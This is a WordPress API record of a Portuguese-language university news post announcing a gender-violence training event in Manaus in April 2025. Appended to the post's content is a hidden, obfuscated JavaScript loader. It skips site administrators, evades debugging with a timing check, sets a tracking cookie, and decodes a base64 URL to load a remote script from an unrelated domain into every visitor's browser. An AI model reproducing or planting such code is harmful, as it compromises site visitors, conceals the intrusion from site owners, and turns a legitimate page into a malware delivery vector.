{"id":1104,"date":"2025-04-08T12:32:40","date_gmt":"2025-04-08T15:32:40","guid":{"rendered":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/?p=1104"},"modified":"2026-04-16T13:16:55","modified_gmt":"2026-04-16T16:16:55","slug":"formacao-para-o-combate-as-violencia-de-genero","status":"publish","type":"post","link":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/2025\/04\/08\/formacao-para-o-combate-as-violencia-de-genero\/","title":{"rendered":"Forma\u00e7\u00e3o para o Combate \u00e0s Viol\u00eancia de G\u00eanero"},"content":{"rendered":"\n<p>PPGSC\/UEA no Encontro de Forma\u00e7\u00e3o para o Combate e Enfrentamento \u00e0s Viol\u00eancias de G\u00eanero!<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"819\" height=\"1024\" src=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/1-819x1024.png\" alt=\"\" class=\"wp-image-1105\" srcset=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/1-819x1024.png 819w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/1-240x300.png 240w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/1-768x960.png 768w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/1.png 1080w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/figure>\n\n\n\n<p>O Programa de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva da Universidade do Estado do Amazonas (PPGSC\/UEA) tem a honra de ser uma das institui\u00e7\u00f5es parceiras do Encontro de Forma\u00e7\u00e3o para o Combate e Enfrentamento \u00e0s Viol\u00eancias de G\u00eanero, promovido pela Escola Judicial do Tribunal de Justi\u00e7a do Amazonas (EJUD\/TJAM).<\/p>\n\n\n\n<p>\ud83d\udcc5 Quando? De 9 a 11 de abril de 2025<\/p>\n\n\n\n<p>\ud83d\udccd Onde? Audit\u00f3rio Desembargador Arthur Virg\u00edlio do Carmo Ribeiro, no Centro Administrativo Desembargador Jos\u00e9 de Jesus Ferreira Lopes, em Manaus.<\/p>\n\n\n\n<p>Ao longo de tr\u00eas dias, o evento reunir\u00e1 pesquisadores, ativistas, profissionais da sa\u00fade, justi\u00e7a e psicologia para debates interdisciplinares sobre:<\/p>\n\n\n\n<p>\u2705 Direitos e pol\u00edticas p\u00fablicas<br>\u2705 Justi\u00e7a reprodutiva e maternidades<br>\u2705 Migra\u00e7\u00e3o e viol\u00eancias de g\u00eanero<br>\u2705 Estrat\u00e9gias para o enfrentamento \u00e0 viol\u00eancia estrutural<\/p>\n\n\n\n<p>Al\u00e9m disso, a programa\u00e7\u00e3o integra o II F\u00f3rum Judici\u00e1rio de Combate \u00e0 Viol\u00eancia Dom\u00e9stica e o III Semin\u00e1rio Amazonense de Psicologia Jur\u00eddica (SAMPJUR), consolidando o evento como um espa\u00e7o essencial de discuss\u00e3o e fortalecimento de a\u00e7\u00f5es em defesa dos direitos humanos.<\/p>\n\n\n\n<p>A participa\u00e7\u00e3o da UEA e do PPGSC reafirma nosso compromisso com a promo\u00e7\u00e3o da equidade de g\u00eanero e a luta contra as viol\u00eancias que atingem mulheres e popula\u00e7\u00f5es vulnerabilizadas na Amaz\u00f4nia.<\/p>\n\n\n\n<p>Confira a programa\u00e7\u00e3o completa:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"819\" height=\"1024\" src=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/2-819x1024.png\" alt=\"\" class=\"wp-image-1106\" srcset=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/2-819x1024.png 819w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/2-240x300.png 240w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/2-768x960.png 768w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/2.png 1080w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"819\" height=\"1024\" src=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/3-819x1024.png\" alt=\"\" class=\"wp-image-1107\" srcset=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/3-819x1024.png 819w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/3-240x300.png 240w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/3-768x960.png 768w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/3.png 1080w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1350\" src=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/4-819x1024.png\" alt=\"\" class=\"wp-image-1108\" srcset=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/4-819x1024.png 819w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/4-240x300.png 240w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/4-768x960.png 768w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/4.png 1080w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<p>\ud83d\udd17 Inscri\u00e7\u00f5es gratuitas e com vagas limitadas:<\/p>\n\n\n\n<p>\ud83d\udc49 https:\/\/bit.ly\/41Tr3mY<\/p>\n\n\n\n<p>\ud83d\udca1 Quer contribuir como monitor(a) volunt\u00e1rio(a)?<\/p>\n\n\n\n<p>\ud83d\udc49 https:\/\/bit.ly\/4cdQenK<\/p>\n\n\n\n<p>O evento conta tamb\u00e9m com a parceria de grandes institui\u00e7\u00f5es como UERJ, UFAM, MJSP, TJRJ, OiIVAB e ATHAM.<\/p>\n\n\n\n<p>\ud83d\udce2 Junte-se a n\u00f3s nessa mobiliza\u00e7\u00e3o pela equidade e justi\u00e7a! \ud83d\udc9c<\/p>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>PPGSC\/UEA no Encontro de Forma\u00e7\u00e3o para o Combate e Enfrentamento \u00e0s Viol\u00eancias de G\u00eanero! O Programa de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva da Universidade do Estado do Amazonas (PPGSC\/UEA) tem a honra de ser uma das institui\u00e7\u00f5es parceiras do Encontro de Forma\u00e7\u00e3o para o Combate e Enfrentamento \u00e0s Viol\u00eancias de G\u00eanero, promovido pela Escola Judicial do [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":1105,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-1104","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"blocksy_meta":[],"_links":{"self":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1104","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/comments?post=1104"}],"version-history":[{"count":3,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1104\/revisions"}],"predecessor-version":[{"id":1336,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1104\/revisions\/1336"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media\/1105"}],"wp:attachment":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media?parent=1104"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/categories?post=1104"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/tags?post=1104"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}